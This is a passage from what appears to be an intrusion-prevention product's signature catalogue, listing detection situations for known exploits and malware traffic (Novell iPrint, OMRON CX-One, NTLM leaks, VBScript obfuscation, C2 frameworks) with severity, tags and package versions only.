Vulnerability: Non-Standard-Port-In-Iframe-Src-Attribute
Description:
Back to top

File-Text_Norton-AntiVirus-ActiveX-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Norton AntiVirus detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, CVE2004, Windows not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Norton-AntiVirus-ActiveX-Denial-Of-Service
Description:
Back to top

File-Text_Norton-Internet-Security-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Norton Internet Security detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton Internet Security, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Norton-Internet-Security-Remote-Command-Execution
Description:
Back to top

File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2
Description:
Back to top

File-Text_Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval
Description:
Back to top

File-Text_Novell-Groupwise-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Client for Windows, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Novell-Groupwise-Client-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Novell-Groupwise-Client-For-Windows-Vulnerable-Method-Usage

About this situation: Usage of a vulnerable method detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Client for Windows, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-510-5211
Last changed: sgpkg-ips-743-5211
Vulnerability: Novell-Groupwise-Client-For-Windows-ActiveX-Code-Execution
Description:
Back to top

File-Text_Novell-Groupwise-Client-Gwmim1.ocx-Untrusted-Pointer-Dereference

About this situation: A vulnerable function in an ActiveX was used
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Client, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Novell-Groupwise-Client-ActiveX-Gwmim1.ocx-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow-2

About this situation: Attempt to exploit buffer overflow vulnerability in Novell GroupWise Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell GroupWise Client, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Novell Groupwise WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Groupwise WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Novell-Groupwise-WebAccess-Cross-Site-Scripting
Description:
Back to top

File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting-2

About this situation: An attempt to exploit a vulnerability in Novell Groupwise WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Groupwise WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: Novell-Groupwise-WebAccess-Cross-Site-Scripting
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-743-5211
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-Target-Frame-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-988-5242
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-743-5211
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-625-5211
Vulnerability: Novell-iPrint-Client-ActiveX-Control-GetPrinterURLLList-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: HTTP-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-625-5211
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-Control-Vulnerable-Method-Call

About this situation: A call for a vulnerable method in Novell iPrint Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-754-5211
Vulnerability: HTTP-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
Description:
Back to top

File-Text_Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client for Windows detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iPrint Client for Windows, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1747-5242
Vulnerability: Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free
Description:
Back to top

File-Text_Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iPrint Client, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF-2

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iPrint Client, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-422-4219
Vulnerability: Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-Remote-File-Deletion

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Novell-iPrint-Client-Remote-File-Deletion
Description:
Back to top

File-Text_Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iPrint Client, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-988-5242
Vulnerability: Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321
Description:
Back to top

File-Text_Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-743-5211
Vulnerability: Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
Description:
Back to top

File-Text_Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Messenger, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1748-5242
Vulnerability: Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution

About this situation: An attempt to exploit a vulnerability in Novell ZENworks AdminStudio or Configuration Management detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, Novell ZENworks AdminStudio, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution
Description:
Back to top

File-Text_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-07, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: NTLM-Credentials-Leak-Via-Internet-Shortcut-CVE-2023-32046
Description:
Back to top

File-Text_NTLM-Hash-Disclosure-CVE-2024-43451

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-11, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: NTLM-Hash-Disclosure-CVE-2024-43451
Description:
Back to top

File-Text_NTR-ActiveX-Control-Check-Buffer-Overflow

About this situation: An attempt to exploit an NTR ActiveX Control Check Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, NTRglobal, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: NTR-ActiveX-Control-Check-Buffer-Overflow
Description:
Back to top

File-Text_NTR-ActiveX-StopModule-Code-Execution

About this situation: An attempt to exploit an NTR ActiveX StopModule Code Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows Vista, Any Hardware, NTRglobal, CVE2012, Windows XP not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: NTR-ActiveX-StopModule-Code-Execution
Description:
Back to top

File-Text_Nymaim-Botnet-Traffic

About this situation: Nymaim botnet traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: Nymaim-Botnet
Description:
Back to top

File-Text_Obfuscated-Evaluated-Script-Content

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1430-5242
Description:
Back to top

File-Text_Obfuscated-VBScript-Char-Execute-Detected

About this situation: Obfuscated VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Vulnerability: VBScript-Scripting-Detected
Description:
Back to top

File-Text_Obfuscated-VBScript-Detected

About this situation: Obfuscated VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-875-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: VBScript-Scripting-Detected
Description:
Back to top

File-Text_Obfuscated-VBScript-Inside-JavaScript

About this situation: Malicious VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Malicious-VBScript-Execution
Description:
Back to top

File-Text_Obfuscated-VBScript-Shell-Detected

About this situation: Obfuscated VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Vulnerability: VBScript-Scripting-Detected
Description:
Back to top

File-Text_Object-Classid-In-Nonstandard-Format

About this situation: A nonstandard format of the class id of an object was detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-470-5211
Vulnerability: Object-Classid-In-Nonstandard-Format
Description:
Back to top

File-Text_October-CMS-Unauthorized-Password-Change-CVE-2021-32648

About this situation: An attempt to exploit a vulnerability in October CMS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, October CMS, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: October-CMS-Unauthorized-Password-Change-CVE-2021-32648
Description:
Back to top

File-Text_Octopus-C2-Initial-Infection-Traffic

About this situation: Octopus C2 framework initial infection traffic was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Octopus-C2-Infection-Traffic
Description:
Back to top

File-Text_Oldrea-Havex-CnC-Response

About this situation: An Oldrea/Havex Backdoor CnC response detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Description:
Back to top

File-Text_OLE-File-In-Text-File

About this situation: An OLE file found in a text file
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-419-4219
Vulnerability: OLE-File-In-Text-File
Description:
Back to top

File-Text_Oleaut32.dll-Remote-Code-Execution-Vulnerability

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: Oleaut32.dll-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Text_Ollama-Getblobspath-Digest-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ollama detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ollama, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Vulnerability: Ollama-Getblobspath-Digest-Directory-Traversal
Description:
Back to top

File-Text_Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Omron-CX-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-flnet-Version-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Omron-Cx-One-Cx-flnet-Version-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Vulnerability: Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Vulnerability: Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Programmer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1746-5242
Vulnerability: Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Programmer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1148-5242
Vulnerability: Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-Cx-programmer-Program-Use-After-Free

About this situation: An attempt to exploit a vulnerability in OMRON CX-One CX-Programmer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1166-5242
Vulnerability: Omron-Cx-One-Cx-programmer-Program-Use-After-Free
Description:
Back to top

File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OMRON CX-One detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OMRON CX-One, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246

About this situation: An attempt to exploit a vulnerability in OneDev Platform detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OneDev Platform, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
Description:
Back to top

File-Text_OpenNMS-Authenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in OpenNMS detected
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, OpenNMS, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: OpenNMS-Privilege-Escalation-CVE-2023-40315
OpenNMS-Privilege-Escalation-CVE-2023-0872
Description:
Back to top

File-Text_OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Text_OpenSSL detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow
Description:
Back to top

File-Text_Opera-10.53-JavaScript-getImageData-Memory-Corruption-Vulnerability

About this situation: An attempt to exploit a vulnerability in Opera detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

File-Text_Opera-Browser-Document-Writing-Uninitialized-Memory-Access

About this situation: An attempt to exploit a vulnerability in Opera Software Opera detected
Context: Text File Stream
Severity: 7
